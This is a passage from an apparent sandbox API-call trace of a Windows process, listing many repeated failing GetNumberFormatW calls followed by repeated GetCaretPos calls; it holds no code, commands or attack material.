| out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.579] GetLastError () returned 0x57 [0025.579] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.580] GetLastError () returned 0x57 [0025.580] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.581] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.581] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.582] GetLastError () returned 0x57 [0025.582] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.583] GetLastError () returned 0x57 [0025.583] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.584] GetLastError () returned 0x57 [0025.584] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.584] GetLastError () returned 0x57 [0025.584] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.584] GetLastError () returned 0x57 [0025.584] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.584] GetLastError () returned 0x57 [0025.584] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.584] GetLastError () returned 0x57 [0026.222] lstrlenA (lpString="") returned 0 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0026.222] GetCaretPos (in: lpPoint=0x18fa94 | out: 